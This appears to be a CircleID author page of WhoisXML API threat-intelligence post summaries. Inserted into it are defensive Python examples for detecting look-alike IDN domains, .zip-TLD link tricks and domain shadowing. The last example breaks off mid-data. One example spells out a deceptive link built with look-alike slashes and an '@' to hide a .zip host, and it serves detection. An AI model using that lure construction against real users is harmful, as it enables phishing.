A Domain Research, Whois, DNS, and Threat Intelligence API and Data Provider
Joined on February 28, 2019
About
Whois API, Inc. (WhoisXML API) is a big data and API company that provides domain research and monitoring, Whois, DNS, IP, and threat intelligence APIs, data, and tools to a variety of industries.
We serve Fortune 500 companies as well as small businesses, including cyber-security companies, corporations with a cyber-security division, government agencies, domain registries and registrars, brand agents, domain brokers and investors, marketing data warehouses, banks, telecoms, online payment processors, law firms, financial institutions, and many more.
We have been based in Los Angeles since 2010 and have been recognized (in 2017, 2018, 2019, 2021, and 2022) as one of the Inc. 5000 fastest-growing companies, notably in the Security and Top IT categories.
Except where otherwise noted, all postings by WhoisXML API on CircleID are licensed under a Creative Commons License.
WhoisXML API analyzed close to 22 million domains registered in Q3 2024 to uncover global domain activity trends.
Phishing has been around for years, yet it still proves to be a major online threat. To keep profiting, cybercriminals must continuously adapt their techniques.
The U.S. Department of Justice's Office of Public Affairs issued a statement on 4 September 2024 on the seizure of 32 domains believed to be part of the so-called "Doppelganger" campaign.
While deepfakes may sometimes be perceived as amusing, their potential for harm is significant and far-reaching. One finance worker at a multinational firm, for example, was tricked into paying out US$25 million to a deepfake scammer who impersonated the company's chief financial officer (CFO) in a video call in February 2024.
Toward the end of August 2024, a custom malware dubbed "Voldemort," after strings found in its code, was used in a cyber espionage campaign targeting various countries.
At least 40 advanced persistent threat (APT) groups have trained their sights on European countries over the years, and that isn't surprising, given that the continent hosts the headquarters of international organizations such as the European Union Agency for Law Enforcement Cooperation (Europol), INTERPOL, and the North Atlantic Treaty Organization (NATO).
Nearly 1 million individuals' information was stolen and exposed when threat actors launched a BlackSuit ransomware attack on 10 April 2024. The investigation revealed that the compromised data included the victims' Social Security numbers (SSNs), dates of birth, and insurance claim information.
Remote access trojans (RATs) can be considered the malware of choice of the world's most notorious advanced persistent threat (APT) groups, and there's a good reason for that: they are hard to detect, which makes them ideal for lateral movement, and they are also difficult to remove.
Threat actors often find targeting certain organizations too much of a challenge, so they go through what can be considered back channels: suppliers, vendors, or service providers.
While the use of internationalized domain names (IDNs) allows organizations the world over to enter the global market with native-language domain names, it also lets attackers craft look-alikes of the legitimate domains they wish to spoof, since many non-Latin characters are visually identical to Latin ones.
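The look-alike problem described above, as an added example that is not part of the original post or of WhoisXML API's products: the script decodes a punycode (xn--) label back to Unicode, checks whether the leftmost label mixes scripts, and reduces it to a Latin "skeleton" that is compared against a watchlist of protected names. The watchlist, the confusable map (a small constructed subset of the Unicode UTS #39 confusables table), and the sample domains are all assumptions made for the example.

```python
import unicodedata

# Constructed watchlist of protected brand labels (assumption: your own list).
PROTECTED_LABELS = {"apple", "paypal", "example"}

# Constructed subset of Unicode confusables: non-Latin letters that render like
# Latin ones. A real deployment would load the full UTS #39 confusables.txt.
CONFUSABLES = {
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p",  # Cyrillic а е о р
    "\u0441": "c", "\u0445": "x", "\u0443": "y", "\u04cf": "l",  # Cyrillic с х у ӏ
    "\u03bf": "o", "\u03b1": "a", "\u03c1": "p",                 # Greek ο α ρ
    "\u0131": "i",                                               # dotless i
}


def to_unicode(domain: str) -> str:
    """Convert each A-label (xn--...) to its U-label; ASCII labels pass through."""
    labels = []
    for label in domain.lower().split("."):
        if label.startswith("xn--"):
            label = label.encode("ascii").decode("idna")
        labels.append(label)
    return ".".join(labels)


def scripts_in(label: str) -> set:
    """Script names (first word of the Unicode character name) of the letters in a label."""
    return {unicodedata.name(ch, "UNKNOWN").split()[0] for ch in label if ch.isalpha()}


def skeleton(label: str) -> str:
    """Map confusables to Latin and NFKC-normalise, approximating a UTS #39 skeleton."""
    mapped = "".join(CONFUSABLES.get(ch, ch) for ch in label)
    return unicodedata.normalize("NFKC", mapped).lower()


def analyze(domain: str) -> dict:
    """Flag a domain whose leftmost label is a look-alike of a protected label.

    Simplification: the leftmost label is treated as the brand slot; a production
    tool would use the Public Suffix List to find the registrable label instead.
    """
    uni = to_unicode(domain)
    first = uni.split(".")[0]
    sk = skeleton(first)
    scripts = scripts_in(first)
    lookalike = sk if (sk in PROTECTED_LABELS and sk != first) else None
    return {
        "unicode": uni,
        "scripts": scripts,
        "mixed_script": len(scripts) > 1,
        "skeleton": sk + uni[len(first):],
        "lookalike_of": lookalike,
    }


if __name__ == "__main__":
    # Constructed samples: Latin "apple", one Cyrillic letter, all Cyrillic letters.
    for d in ("apple.com", "xn--pple-43d.com", "\u0430\u0440\u0440\u04cf\u0435.com"):
        print(d, analyze(d))
```

The second sample mixes one Cyrillic letter into a Latin label and is caught by the mixed-script check alone; the third is entirely Cyrillic, passes that check, and is only caught by the skeleton comparison, which is why a watchlist of protected names is needed in addition to script analysis.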
The ReasonLabs Research Team uncovered a new, widespread polymorphic malware campaign that force-installed browser extensions on users' systems.
Satori recently published a report on a massive fraud campaign they have dubbed "Konfety" (Russian for "candy"). Sounds sweet, right?
As if the attention surrounding the upcoming U.S. presidential election were not enough, the WhoisXML API research team may have unveiled thousands of potential sources of disarray: election-related cybersquatting domains. These domains may be a lucrative source of income for some. Case in point?
Fortinet recently discovered a Meduza Stealer variant that takes advantage of the Microsoft Windows SmartScreen vulnerability CVE-2024-21412. The flaw lets remote attackers bypass the SmartScreen security warning dialog and deliver malicious files, in this case the stealer itself.
The WhoisXML API research team analyzed more than 7.3 million domains registered between 1 and 31 July 2024 to identify the five most popular registrars, top-level domain (TLD) extensions, and other global domain registration trends.
Cyber espionage is not uncommon and often occurs between rivals. And though the attackers' tactics and techniques stay the same, their tools do not.
The Zscaler ThreatLabz 2024 Phishing Report named Microsoft, OneDrive, Okta, Adobe, SharePoint, Telegram, pCloud, Facebook, DHL, WhatsApp, ANZ Banking Group, Amazon, eBay, Instagram, Google, Sparkasse Bank, FedEx, PayU, Rakuten, and Gucci as the 20 most phished brands.
Advanced persistent threat (APT) groups will employ any means necessary to compromise the networks of their intended targets. For Cosmic Leopard, that means using GravityRAT, an Android-based malware, and HeavyLift, a Windows-based malware loader, in the recent operation Cisco Talos has dubbed "Operation Celestial Force."
Our research team analyzed more than 21.5 million domains registered between 1 April and 30 June 2024, as seen in the Newly Registered Domains (NRDs) Data Feed.
Keonne Rodriguez and William Lonergan Hill, founders of the cryptocurrency mixing service Samourai Wallet, were arrested and charged in April 2024, and their sites taken down, for facilitating more than US$2 billion in unlawful transactions and laundering more than US$100 million in criminal proceeds.
Phishing remains a top threat. Google alone blocks around 100 million phishing emails daily, and it doesn't help that phishers get extra help from phishing kits: ready-made cybercrime tools that let even newcomers launch attacks in a few simple steps.
Threat researcher Dancho Danchev recently uncovered 130 domains that seemingly belong to fake cryptocurrency sellers. The WhoisXML API research team sought potential connections to the threat by expanding the current list of indicators of compromise (IoCs) using our DNS intelligence sources.
A new advanced persistent threat (APT) group dubbed "Unfading Sea Haze" has been training its sights on organizations in countries bordering the South China Sea.
Check Point Research reported a Foxit PDF Reader vulnerability that threat actors have begun exploiting, putting the application's users at risk. When exploited, the bug presents security warnings whose default options lead unsuspecting users to execute harmful commands.
Cybercriminals can launch distributed denial-of-service (DDoS) attacks with relative ease these days by using DDoS booter services, online services that automate the attack process.
Intel-Ops researchers recently discovered that the 8Base ransomware group has been using Phobos ransomware to infect its targets' networks. 8Base was first observed in 2022 and became markedly more active in mid-2023.
A decade-old advanced persistent threat (APT) group called "Stately Taurus," also known as "Mustang Panda" and "Earth Preta," was recently observed targeting Association of Southeast Asian Nations (ASEAN) countries in cyber espionage activities. Specifically, Palo Alto Networks observed two malware packages that may have been used to target Japan, Myanmar, the Philippines, and Singapore.
More than 30.6 billion records have been exposed in 2024 so far across 8,839 publicly disclosed incidents. Intensifying cybersecurity efforts has thus become more critical than ever for organizations the world over.
Bleeping Computer recently reported that a phishing-as-a-service (PhaaS) platform sold on cybercriminal forums, dubbed "Tycoon 2FA," can compromise Microsoft 365 and Google accounts even when users have two-factor authentication (2FA) enabled. Kits of this kind act as adversary-in-the-middle proxies that relay the real login page and capture the resulting session cookie, so one-time codes and push approvals do not stop them; phishing-resistant methods such as FIDO2 security keys or passkeys do.
The 2024 U.S. tax season is well underway, and as usual, scams of all kinds targeting taxpayers and causing the Internal Revenue Service (IRS) problems have cropped up. One such ongoing malicious campaign has explicitly been training its sights on small business owners and the self-employed.
A new info-stealing malware called "TimbreStealer" is in town. Cisco Talos detected its distribution through a phishing campaign targeting Mexico.
After analyzing 21+ million newly registered domains (NRDs) added from 1 January to 31 March 2024, our researchers found that the new domain registration volume declined by about 32% from the previous quarter.
Threat actors have been abusing App Installer, a Windows 10 feature that makes installing applications more convenient. The abuse could lead to ransomware distribution and was likely carried out by the financially motivated actors Storm-0569, Storm-1113, Sangria Tempest, and Storm-1674. Microsoft has since disabled the ms-appinstaller protocol handler by default in response.
macOS has been attracting the unwanted attention of more and more backdoor operators since late 2023. In February 2024, Bitdefender uncovered RustDoor, a backdoor written in Rust that possibly has ties to the operators of a Windows ransomware.
Group-IB uncovered ResumeLooters, a threat actor group specializing in victimizing job hunters to steal their personally identifiable information (PII).
In the past two decades, at least 41 advanced persistent threat (APT) groups have launched attacks on entities and organizations based in North America.
The Citizen Lab recently uncovered an ongoing online propaganda campaign they have dubbed "PAPERWALL" that has been targeting local news outlets across 30 countries in Europe, Asia, and Latin America.
VexTrio, a traffic distribution system (TDS) operator believed to be affiliated with ClearFake and SocGholish, among other threat actors, has been active since 2017.
Among the latest to suffer from zero-day exploitation is Ivanti, a software company providing endpoint management and remote access solutions to various organizations, including U.S. federal agencies.
Law enforcement agencies shut down xDedic, a cybercrime-as-a-service (CaaS) marketplace that sold access to compromised web servers, back in 2019. However, WhoisXML API threat researcher Dancho Danchev posits that parts of its backend infrastructure may remain traceable.
New kids on the cybercrime block, pig butchering scams, have been making waves lately, and it's not hard to see why. Scammers have been earning a fortune by tricking users into investing in seemingly legitimate business ventures, only for the victims to lose their hard-earned cash.
RisePro, a malware-as-a-service data stealer, has been plaguing users since 2022. ANY.RUN recently analyzed its latest version in depth and identified 10 indicators of compromise (IoCs): three domains and seven IP addresses.
The Sea Turtle threat group recently made headlines when it expanded its operations to target ISPs and telecommunications and media companies in the Netherlands. In the past, Sea Turtle primarily targeted organizations in the Middle East and the U.S. using DNS hijacking and man-in-the-middle (MitM) attacks.
Cybercriminals are known for using so-called "loaders" like XLoader to initiate infections. Worse, even newcomers can now get their hands on these malware distributors via hacker forums. Case in point? JinxLoader, one of the latest malicious offerings for sale on the likes of hackforums[.]net.
The Mirai botnet, first discovered back in 2016, made headlines and gained infamy as the biggest botnet to hit networks the world over. It has resurfaced with multiple ways of infecting Internet of Things (IoT) devices, including the exploitation of zero-day vulnerabilities.
Advanced persistent threat (APT) groups are more dangerous than your run-of-the-mill cybercriminals. They, after all, train their sights not only on financial gain but on loftier goals such as wreaking havoc on entire nations.
WhoisXML API is thrilled to introduce a new version of Website Categorization API and Website Categorization Database. The product line now offers an enhanced website categorization model with additional context, powered by advanced artificial intelligence (AI) algorithms, for better overall stability and accuracy.
Computers infected with the Epsilon stealer could spell game over for serious gamers, but they are not the only ones at risk. The creators of the games the malware operators mimic, such as EPSILON, Pokemon, and Roblox, stand to lose a lot as well: customers, and their reputation in the process.
WhoisXML API is proud to announce data quality improvements to the Newly Registered Domains V2 (NRD2) Data Feed, specifically an 89% increase in total coverage over the last 12 months. Moreover, the data feed recorded a 153.95% increase in activity for the top 10 country-code top-level domains (ccTLDs).
It is not uncommon these days for threat actors to use malicious search ads to distribute malware. To do that, though, they need to bypass Google's security measures by setting up decoy infrastructure.
Mandiant's Managed Defense Threat Hunting Team recently published an in-depth study of the malware distributed via what they have dubbed the "UNC2975 malvertising campaign." Users who were tricked into clicking poisoned sponsored search engine results and social media posts ended up with computers infected with either the DANABOT or DARKGATE backdoor.
The new domain name registration volume rose 10.24% from the third to the fourth quarter of 2023. WhoisXML API researchers uncovered this finding, along with other DNS trends, after analyzing more than 31 million newly registered domains (NRDs) added from 1 October to 31 December 2023 as seen in the Newly Registered Domains Data Feed.
The Kimsuky Group, believed to be a North Korea-based advanced persistent threat (APT) group active since 2013, struck several more times this year. They are notorious for spear-phishing attacks used to gain initial access to targets.
The WailingCrab malware has gained notoriety for its stealth. IBM X-Force security researchers recently published an in-depth analysis of the malware, which abuses the Internet of Things (IoT) messaging protocol MQTT for its command-and-control (C&C) traffic, a choice that blends in with legitimate device telemetry.
The Atomic Stealer, also known as "AMOS," emerged in 2023, spreading on Macs disguised as popular applications. This time around, it has been wreaking more havoc through a fake browser update campaign dubbed "ClearFake."
The concept of internationalization extends from the virtual to the physical realm. Many people wish to travel or even migrate to other countries at some point in their lives. Unfortunately, that's sometimes easier said than done given the many legal documents, including valid IDs, passports, and others, required.
As long as cybercriminals remain in business, underground marketplaces will keep multiplying. And despite crackdowns on the biggest markets like Silk Road, cybercriminals will continue to put up their own marketplaces, given their profitability. Case in point?
Rogue bulletproof hosts are part and parcel of the cybercriminal market hidden deep underground. Without means to easily evade detection, attribution, and prosecution, many of today's cybercriminals could not continue their malicious operations.
Carding has been around since the 1980s but has evolved to the point that even less experienced cybercriminals can now launch campaigns. How? Via the carding forums that riddle the Web these days.
The Federal Bureau of Investigation (FBI) shut down BreachForums, a forum for English-speaking black hat hackers, on 21 March 2023, following the arrest of its owner, Conor Brian Fitzpatrick.
APT29, believed to be a Russian espionage group, became known for launching targeted attacks against organizations in Ukraine. But over the course of investigating the threat group, Mandiant discovered that it may have a hand in cybercriminal operations as well, specifically phishing.
BlackNet RAT, first discovered during the COVID-19 pandemic, when it was distributed via spam messages offering an effective cure for the virus, seems to have outlived the global crisis.
Threat researcher Dancho Danchev recently discovered a phishing operation that seemed to be abusing .top domains, for which he collated 89 email addresses that served as indicators of compromise (IoCs).
Threat actors have yet again been seen abusing a technology meant to make life easier for all of us, QR codes, in one of the most common cybercriminal activities: phishing. The rise in QR code phishing isn't surprising given that, according to several studies, as much as 86% of the global population uses mobile phones for all kinds of transactions, including financial ones. QR codes also let the phishing URL travel inside an image, past email link scanners, and land on a personal phone outside corporate web filtering.
A phishing campaign is currently targeting Facebook business accounts with password-stealing malware. The attackers have been using a massive network of fake and compromised Facebook accounts to send out millions of Messenger phishing messages.
Rhysida, a new ransomware currently plaguing users, may not be novel, but it's proving just as effective. Fortra published an in-depth analysis of the malware, which is currently holding hostage the data of healthcare organizations based primarily in the U.S.
It's not uncommon for cybercriminals to tweak an existing piece of malware and then call it a new creation. We've seen that happen even in malware's earliest days. It's actually happening more and more these days, especially with the rise of the malware-as-a-service (MaaS) business model.
XLoader has been plaguing macOS users since it was first discovered in 2021. Back then, though, it only posed a threat to those who had installed Java on their systems.
DNS abuse combined with redirection seems to be gaining popularity as a stealth mechanism. We've just seen Decoy Dog employ the same tactic. More recently, a still-unnamed JavaScript (JS) malware has been wreaking havoc on WordPress site owners by abusing Google Public DNS, over its DNS-over-HTTPS interface, to look up TXT records that carry the destination, and redirecting victims to tech support scam sites. Because the lookup goes to dns.google over HTTPS, it never touches the victim's local resolver and leaves no trace in ordinary DNS logs.
Given the ubiquity of mobile phone usage, you'd think we'd all know by now how to tell legitimate from scammy text messages. Then again, cybercriminals are always on top of their game, learning how the latest technologies work and finding ways to abuse them.
The financially motivated threat actors called "TA544" were first detected in 2017. TA544 is known for high-volume campaigns, sending hundreds of thousands of malicious messages daily.
Evolution isn't only for humans and other living things. Apparently, malware can evolve, too, and IcedID is a good example. First detected as a banking trojan in 2017, IcedID continues to receive updates that make it even more dangerous. In the past few months, IcedID variants have been observed delivering ransomware payloads instead of performing their original function: stealing financial data.
WoofLocker tech support scams have been wreaking havoc since 2017, but the threat actors behind them don't seem to be done yet. In fact, the threat may have become even more resilient.
Decoy Dog, a malware notorious for abusing the DNS, specifically by establishing command and control (C&C) over DNS queries, most likely first reared its head in early 2022. Given its stealth, the DNS malware has been used to successfully steal data from organizations throughout Russia and other Eastern European nations.
Threat actors have been targeting vulnerable Redis instances since February 2022, when the Redis Lua sandbox escape and remote code execution vulnerability CVE-2022-0543 was disclosed. The flaw is specific to the Debian and Ubuntu packages of Redis, whose Lua build left the package library reachable from scripts, and it is only exploitable on instances exposed without authentication. The Muhstik gang was one of the first groups to exploit it.
APT41, also known as "Winnti," "BARIUM," or "Double Dragon," is an APT group said to originate from China. Active since 2012, APT41 rose to infamy by successfully launching targeted cyber espionage attacks on government agencies and private companies worldwide.
Even solutions meant to enhance security can sometimes fall prey to the best cyber attackers. That's what happened to JumpCloud, a cloud-based directory platform designed to centralize and simplify identity and access management (IAM).
The cyber espionage group MuddyWater, also known as Mercury, saw its first major campaign as early as 2012. But as things always go in the cybersecurity realm, threat groups, especially those that gain infamy, don't necessarily just come and go.
The latest fraud data Sift published in its "Q2 2023 Digital Trust & Safety Index" revealed that 78% of users are concerned that fraudsters could exploit AI tools to victimize them.
Phishing, despite its age and infamy, remains one of the top threats to corporate and personal networks alike. And it's not hard to see why: it continues to be effective. In fact, more than a third of all data breaches today involve phishing.
It's not unusual for data stealers to target several browsers simultaneously. Zooming in on multiple platforms at once, including email clients, gaming portals, chat apps, crypto wallets, and even VPN-protected services, however, is quite novel.
Each time organizations shore up their network defenses, cybercriminals devise new and innovative ways to up the cyber attack ante. That's actually the rationale behind malware crypting: the process of making malicious programs, apps, and files appear harmless to anti-malware and intrusion detection solutions.
When the BlackCat ransomware gang first breached Reddit's network last February, they phished an employee to get into the target network. This time, according to a detailed ReversingLabs report, they claimed responsibility for the breach and threatened to release the company's data if it fails to pay the ransom.
The beginning of June, according to CleanINTERNET, marked the emergence of several zero-day attacks targeting vulnerable MOVEit servers to exfiltrate confidential data. MOVEit Transfer is managed file transfer software that supports file and data exchange.
Google's announcement of the launch of the .zip new gTLD (ngTLD) was met with a lot of debate. Many believe threat actors could abuse the ngTLD for phishing and other malicious campaigns, primarily because it is easily confused with the .zip file extension: a string that reads as the name of an archive can, in a URL, be a hostname.
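Why the confusion matters in practice, as an added example that is not part of the original post: under the standard URL syntax (RFC 3986), anything before an "@" in the authority part is userinfo and is discarded when a client picks the host to connect to. A link dressed up to look like a path to an archive on a trusted site can therefore resolve to a .zip hostname the attacker registered. The sample text and the `v1.27.1.zip` host are constructed for the example; the slash-like characters in the first link are U+2571 (a box-drawing glyph), not real path separators.

```python
from urllib.parse import urlsplit


def effective_host(url: str) -> str:
    """Hostname a client will actually connect to.

    urlsplit() applies the RFC 3986 authority rule: the part before the last '@'
    is userinfo and is dropped, and an optional ':port' is removed.
    """
    return (urlsplit(url).hostname or "").lower()


def zip_tld_hosts(text: str) -> list:
    """Return the effective hostnames of http(s) URLs in `text` that sit under .zip.

    Tokens are split on whitespace, which is enough for chat or email bodies;
    a mail gateway would use its own link extractor.
    """
    hosts = []
    for token in text.split():
        if not token.lower().startswith(("http://", "https://")):
            continue
        host = effective_host(token)
        if host.endswith(".zip"):
            hosts.append(host)
    return hosts


# Constructed sample: the first link looks like the path to an archive on
# github.com, but the separators are U+2571 and the real '@' turns everything
# before it into userinfo, so the host is v1.27.1.zip. The second link is a
# genuine path on github.com and is not flagged.
SAMPLE = (
    "Release: https://github.com\u2571kubernetes\u2571archive@v1.27.1.zip "
    "Source: https://github.com/kubernetes/kubernetes/archive/refs/tags/v1.27.1.zip"
)

if __name__ == "__main__":
    for token in SAMPLE.split():
        if token.startswith("http"):
            print(token, "->", effective_host(token))
    print("flagged:", zip_tld_hosts(SAMPLE))
```

Flagging on the effective host rather than on the visible text is the point: a filter that only looks for ".zip" at the end of a link would treat both sample links alike, while only the first one leaves the trusted site.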
ReliaQuest named LockBit one of the most effective and undoubtedly most prolific currently active ransomware groups today. In fact, the malware topped their latest ransomware quarterly list for the first three months of 2023, a continuation of their 2022 observation. more
Organizations get bombarded with countless attacks from every direction, including via their supply chain. FortifyData's recent record of the top third-party data breaches in 2023 brings to light how multidirectional threat sources can be. In one of the data breaches on the list, AT&T disclosed in March 2023 that threat actors accessed the information of approximately 9 million wireless accounts through the telecommunication company's marketing vendor. more
Last year, several governments reportedly used the NSO Group's spyware Pegasus to exploit a zero-day vulnerability in WhatsApp to spy on journalists, opposition politicians, and dissidents via their mobile devices. Apple quickly addressed the issue by launching more powerful data protection features. more
Google ad or search engine optimization (SEO) poisoning has long been a favored threat actor tactic to spread malware. A recent Secureworks study of Bumblebee, which comes in the guise of a software installer, proved that once again. more
The more dangerous browsing the Internet becomes, the more tools to address cyber threats emerge in the market. Virtual private network (VPN) service usage, for instance, gained ubiquity due to the ever-increasing number of data privacy intrusions. more
We've proven time and again that the effects of current events always extend to the DNS. Just last month, two big banks - the Silicon Valley Bank (SVB) and Credit Suisse - collapsed. Financial experts said more banks may be bound to follow. more
Threat actors continue to abuse the DNS by weaponizing domain names. On 13 April 2023, through our recently launched Threat Intelligence Data Feeds (TIDF), we identified more than 1 million suspicious and malicious domains that figured in phishing, malware distribution, spam, and other cyber attacks, such as brute-force and distributed denial-of-service (DDoS) attacks. more
Threats tend to become more advanced over time. So is the case of business email compromise (BEC) scams, which according to a SlashNext post, cost companies billions of U.S. dollars in losses per year. more
Infoblox, in its Q4 2022 Cyber Threat Report, featured a "Meta" coin scam using fake celebrity endorsements targeting users in the European Union (EU). The analysis revealed several indicators of compromise (IoCs), specifically four domains and one IP address, that could help the public avoid the perils the scams posed. more
Although fraud is a global issue, some threats may be unique to certain regions. Accertify listed some subtrends specific to Latin America and the Caribbean (LAC), including those involving the airline and digital wallet industries. more
Back in January of this year, we studied the infrastructure of Ducktail, a malware that trailed its sights on Facebook business owners and advertisers. Just this month, Morphisec researchers found a similar threat they've dubbed "SYS01." more
Among the most active and rapidly spreading ransomware in 2022 was Black Basta. It was first detected in April 2022 and victimized nearly 100 organizations in North America, Europe, and Asia by September that same year. As a ransomware-as-a-service (RaaS) malware, Black Basta employs double extortion to force victims to pay the ransom. more
Even if cyber attack tactics, techniques, and procedures (TTPs) have become increasingly sophisticated over the years, age-old phishing remains the most-used attack vector to this day. more
Lorec53, a relatively new APT group according to NSFocus, actively targeted various Eastern European government institutions in 2021. The threat actors used well-crafted phishing campaigns to gather and steal data from their targets. Two years after their heyday, is the threat Lorec53 poses gone? Or has the group left still-active traces in the DNS? more
On 10 February 2023, Reddit announced it suffered a security incident where a phishing campaign led an employee to a website that imitated the network's intranet gateway. more
Scammers and fraudsters have been making life hard for users the world over for a long time now. To help expose potential malicious campaigns, threat researchers like Dancho Danchev have been collating indicators of compromise (IoCs) that can be used in further investigations. more
The healthcare industry has had a rough couple of years since the COVID-19 pandemic started. But this didn't stop threat actors from attacking the sector, with several healthcare organizations targeted by ransomware, data breach, and other cyber attacks. more
Since its launch last November, the ChatGPT hype has only increased not only among users but also abusers. Cyble researchers recently spotted phishing attacks using supposed ChatGPT sites to phish for personally identifiable information (PII), specifically credit card data. more
We've seen threat actors abuse almost all Windows OS applications in their campaigns, disguising malware as macros, Word documents, Excel spreadsheets, and PowerPoint presentations to trick users into opening and executing them. Most recently, they've been spreading malware in the guise of OneNote documents to cause mayhem. more
Carding or the theft and consequent selling of credit and other payment card information to users has long been a problem. And with the ease of obtaining hosts for carder forums and communities and hiding their tracks online, the threat has become even bigger. more
As all initial-access threats go, SocGholish is among the trickiest. It often comes disguised as software updates, deceiving victims into downloading a malicious payload that could eventually lead to more lethal cyber attacks. In fact, researchers at ReliaQuest found evidence that an initial SocGholish malware distribution was intended to deploy ransomware. more
The Hive Ransomware Group has had more than 1,500 victims across more than 80 countries worldwide. They attacked hospitals, school districts, financial firms, and critical infrastructure until the U.S. Department of Justice (DOJ) disrupted their operations. Have we seen the fall of the group's entire infrastructure? more
Targeting governments the world over in cyber attacks is not a novel concept. Doing that using mobile apps, however, is quite new as a tactic. And that's what Cyble researchers reported as Gigabud RAT's modus operandi - trailing its sights on citizens of Thailand, the Philippines, and Peru who use government-owned institutions' mobile apps. more
Putting on a mask on malware has always worked to trick users into downloading them, and the threat actors behind Batloader banked on just that. Trend Micro researchers tracked and analyzed Batloader-related developments toward the end of 2022. more
Taking control of victims' accounts is typically the end goal of many cybercriminals, and they never cease to come up with wily ways to do so. Bleeping Computer researchers recently spotted hackers spreading malware mayhem through Google search ads supposedly pointing to open-source software download sites. more
AutoIT-compiled malware and Dridex trace their roots to as far back as 2008 and 2014, respectively. As malware variants go, therefore, they've both had a long history and taken on various forms over time. But despite having been detected and consequently blocked with each new version, they're still alive and kicking -- a testament to their persistence. more
Threat actors have been targeting Zoom and its users since the platform's launch, and it's easy to see why -- the latest stats show it accounts for 3.3 trillion annual meeting minutes worldwide. It's not surprising, therefore, that cyber attackers trailed their sights yet again on the communication app. more
Cyber espionage group Cloud Atlas has been trailing its sights on critical infrastructure operators in countries suffering from political conflict since its discovery in 2014. Aptly nicknamed "Inception," the group's tactic of going after nations with bigger problems than cybersecurity seems to be working, as evidenced by successful intrusions over the years. more
As far back as September 2022, Trend Micro reported that threat actors began exploiting chat apps Comm100 and LiveHelp100 to launch supply chain attacks. In a bid to help potential targets curb the problem, they publicized nine indicators of compromise (IoCs), specifically command-and-control (C&C) server addresses. more
As an age-old digital threat, phishing just continues to grow in sophistication over time, as DarkTortilla showed. Cyble Research and Intelligence Labs (CRIL) published a technical analysis of the threat specifically targeting Cisco and Grammarly. Are there other potential threat vectors, though? more
Earlier this month, ReversingLabs published a report on the current state of software supply chain security. They stated that the volume of such attacks using npm and PyPI code have increased by a combined 289% in the past four years. The research also cited two npm attacks as evidence -- IconBurst and Material Tailwind. more
For roughly US$100, threat actors can purchase RedLine Stealer, a malware-as-a-service (MaaS) program first detected in March 2020 that continues to wreak havoc to this day. The malware can steal information from infected devices, including autocomplete and saved information on browsers. more
WithSecure recently unveiled a malicious campaign dubbed "Ducktail," which trained its sights on Facebook business owners and advertisers. Believed to be run by Vietnamese operators, Ducktail uses malware to steal data from victims and hijack vulnerable Facebook business properties. more
Stealth is a typical goal for most threat actors when launching malware and other attacks. The better hidden malware is, the more effective an attack becomes. And that is what fast-rising data stealer Aurora is gaining notoriety for. more
DEV-0569, a threat actor Microsoft has been monitoring, was recently observed deploying Royal ransomware via pages posing as legitimate software download sites and repositories, among other stealthy tactics. The group has so far used fake download sites for Adobe Flash Player, AnyDesk, Zoom, and TeamViewer in phishing emails and domains. more
WhoisXML API's IP intelligence now includes Regulatory Compliance IP Data Feeds available as separate IP geolocation and IP netblocks files. These data feeds are filtered to only provide the IP geolocation and ownership data of IP addresses from sanctioned or restricted locations as specified by different regulatory authorities. more
In the realm of cybersecurity, seizing domains unfortunately doesn't always mean the end for the threats they pose. Such could be the case for the 18 domains U.S. law enforcement agents recently took offline for their ties to a money mule recruitment operation reported by Bleeping Computer. more
SecurityScorecard published a report on a cyber attack that a U.S. county disclosed on 11 September 2022. With ransomware attacks against local government units increasing in the past few years, WhoisXML API researchers decided to build on the list of IP addresses related to the attack. more
Zimperium zLabs threat researchers recently reported the case of the Cloud9 Chrome Botnet, and rightly so. Many of us seem to forget just how much information cybercriminals can steal from our browsers. more
The Pakistan-India rivalry has been going on for some time now, not just in sports events but also online in the form of cyber attacks. Zscaler ThreatLabz has been monitoring a result of this ongoing friction, Transparent Tribe, also known as "APT36," since the start of this year. more
The threat actor dubbed "RomCom," known for deploying spoofed versions of popular software, has been quite busy these past few months. In the past, the group was seen imitating Advanced IP Scanner and PDF Filler. More recently, though, it has been targeting Ukraine, the U.K., and other English-speaking countries by spoofing SolarWinds, KeePass, PDF Reader Pro, and Veeam. more
You may be wondering who Robin Banks is, but you should instead ask what Robin Banks is. Robin Banks is a phishing-as-a-service (PhaaS) platform that first surfaced in March this year. The name is a play on the phrase "robbing banks," coined by IronNet researchers who introduced the malicious platform to the world. more
This year, the stock market is at its most volatile state due to several factors. Debates abound about whether 2022 will be as bad as 2008, but we'll leave that up to the experts. more
Did you know that a Magniber ransomware infection can cost you a ransom of as much as US$2,500? The operators' favored method of delivery? Fake Windows 10 updates, putting 80% of all Windows operating system (OS) users worldwide at risk. The campaign, believed to have begun in April this year, remains a threat. Are Windows 10 users the only ones at risk, though? more
It has become customary for cybercriminals to ride on famous brands to make their nefarious campaigns work. The release of the world's most-awaited tech gadgets is no different. And given the public attention and techies' innate desire to be first to own the latest gadgets, threat actors will always zoom in on prospective buyers via the most ingenious scams. more
Internet users are being tricked into installing browser extensions that can hijack their web searches. The end goal could be to insert affiliate links, but who knows what other malicious activities the threat actors behind them are capable of? more
Anyone who wishes to browse the Internet without the prospect of being spied upon by others, whether for legal or illegal purposes, can always rely on using the Tor browser if they're so inclined. more
Palo Alto Networks threat analysts discovered more than 12,000 cases of domain shadowing after scanning the Web from April to June 2022. For this threat, all cybercriminals need to do is create malicious subdomains under legitimate domains... more
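Domain shadowing is hard to spot from the subdomain name alone, because the parent domain is legitimate and often long-established. One practical triage heuristic is to compare each subdomain's hosting against where the apex and www records live, and to weight recently observed subdomains that resolve to a different netblock. The following is an added example written for this page, not code from the original post or from Palo Alto Networks; the passive DNS records are constructed sample data, the /24 netblock comparison and the 30-day "recent" window are assumptions, and the apex extraction assumes a one-label public suffix (a real tool would use the Public Suffix List).

```python
from datetime import date
from ipaddress import ip_address, ip_network

# Constructed passive DNS sample (example data, not real observations).
# 203.0.113.0/24 and 198.51.100.0/24 are documentation ranges.
SAMPLE_PDNS = [
    {"name": "example-bakery.com", "type": "A", "rdata": "203.0.113.10", "first_seen": "2019-05-02"},
    {"name": "www.example-bakery.com", "type": "A", "rdata": "203.0.113.10", "first_seen": "2019-05-02"},
    {"name": "mail.example-bakery.com", "type": "A", "rdata": "203.0.113.25", "first_seen": "2019-06-11"},
    {"name": "login-verify.example-bakery.com", "type": "A", "rdata": "198.51.100.77", "first_seen": "2022-06-14"},
    {"name": "cdn-update.example-bakery.com", "type": "A", "rdata": "198.51.100.78", "first_seen": "2022-06-15"},
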